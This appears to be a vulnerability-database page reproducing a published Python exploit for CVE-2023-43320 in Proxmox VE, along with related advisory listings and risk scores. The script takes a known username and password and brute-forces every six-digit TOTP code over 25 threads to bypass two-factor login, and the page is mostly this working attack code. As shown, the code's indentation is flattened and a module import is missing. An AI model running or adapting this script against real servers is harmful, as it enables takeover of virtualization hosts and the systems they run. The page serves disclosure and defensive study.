Proxmox VE 7.4-1 TOTP Brute Force

🗓️ 02 Feb 2024 00:00:00Reported by Gabe Rust, Cory ClineType

packetstorm🔗 packetstormsecurity.com👁 506 Views

Proxmox VE 7.4-1 TOTP Brute Force CVE-2023-4332

Reporter	Title	Published	Views	Family All 11
0day.today	Proxmox VE - TOTP Brute Force Exploit	31 Jan 202400:00	–	zdt
ATTACKERKB	CVE-2023-43320	27 Sep 202323:15	–	attackerkb
CNNVD	Proxmox Virtual Environment Security Vulnerability	27 Sep 202300:00	–	cnnvd
CVE	CVE-2023-43320	27 Sep 202300:00	–	cve
Cvelist	CVE-2023-43320	27 Sep 202300:00	–	cvelist
Exploit DB	Proxmox VE - TOTP Brute Force	31 Jan 202400:00	–	exploitdb
NVD	CVE-2023-43320	27 Sep 202323:15	–	nvd
Prion	Authentication flaw	27 Sep 202323:15	–	prion
Positive Technologies	PT-2023-28777 · Proxmox · Proxmox Ve +2	27 Sep 202300:00	–	ptsecurity
RedhatCVE	CVE-2023-43320	9 Jan 202612:40	–	redhatcve

`# Exploit Title: Proxmox VE TOTP Brute Force  
# Date: 09/23/2023  
# Exploit Author: Cory Cline, Gabe Rust  
# Vendor Homepage: https://www.proxmox.com/en/  
# Software Link: http://download.proxmox.com/iso/  
# Version: 5.4 - 7.4-1  
# Tested on: Debian  
# CVE : CVE-2023-43320  
  
import time  
import requests  
import urllib.parse  
import json  
import os  
import urllib3  
  
urllib3.disable_warnings()  
threads=25  
  
#################### REPLACE THESE VALUES #########################  
password="KNOWN PASSWORD HERE"  
username="KNOWN USERNAME HERE"  
target_url="https://HOST:PORT"  
##################################################################  
  
ticket=""  
ticket_username=""  
CSRFPreventionToken=""  
ticket_data={}  
  
auto_refresh_time = 20 # in minutes - 30 minutes before expiration  
last_refresh_time = 0  
  
tokens = [];  
  
for num in range(0,1000000):  
tokens.append(str(num).zfill(6))  
  
def refresh_ticket(target_url, username, password):  
global CSRFPreventionToken  
global ticket_username  
global ticket_data  
refresh_ticket_url = target_url + "/api2/extjs/access/ticket"  
refresh_ticket_cookies = {}  
refresh_ticket_headers = {}  
refresh_ticket_data = {"username": username, "password": password, "realm": "pve", "new-format": "1"}  
ticket_data_raw = urllib.parse.unquote(requests.post(refresh_ticket_url, headers=refresh_ticket_headers, cookies=refresh_ticket_cookies, data=refresh_ticket_data, verify=False).text)  
ticket_data = json.loads(ticket_data_raw)  
CSRFPreventionToken = ticket_data["data"]["CSRFPreventionToken"]  
ticket_username = ticket_data["data"]["username"]  
  
def attack(token):  
global last_refresh_time  
global auto_refresh_time  
global target_url  
global username  
global password  
global ticket_username  
global ticket_data  
if ( int(time.time()) > (last_refresh_time + (auto_refresh_time * 60)) ):  
refresh_ticket(target_url, username, password)  
last_refresh_time = int(time.time())  
  
url = target_url + "/api2/extjs/access/ticket"  
cookies = {}  
headers = {"Csrfpreventiontoken": CSRFPreventionToken}  
stage_1_ticket = str(json.dumps(ticket_data["data"]["ticket"]))[1:-1]  
stage_2_ticket = stage_1_ticket.replace('\\"totp\\":', '\"totp\"%3A').replace('\\"recovery\\":', '\"recovery\"%3A')  
data = {"username": ticket_username, "tfa-challenge": stage_2_ticket, "password": "totp:" + str(token)}  
response = requests.post(url, headers=headers, cookies=cookies, data=data, verify=False)  
if(len(response.text) > 350):  
print(response.text)  
os._exit(1)  
  
while(1):  
refresh_ticket(target_url, username, password)  
last_refresh_time = int(time.time())  
  
with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:  
res = [executor.submit(attack, token) for token in tokens]  
concurrent.futures.wait(res)  
  
  
`

02 Feb 2024 00:00Current

7.4High risk

Vulners AI Score7.4

CVSS 3.18.8

EPSS0.03153

SSVC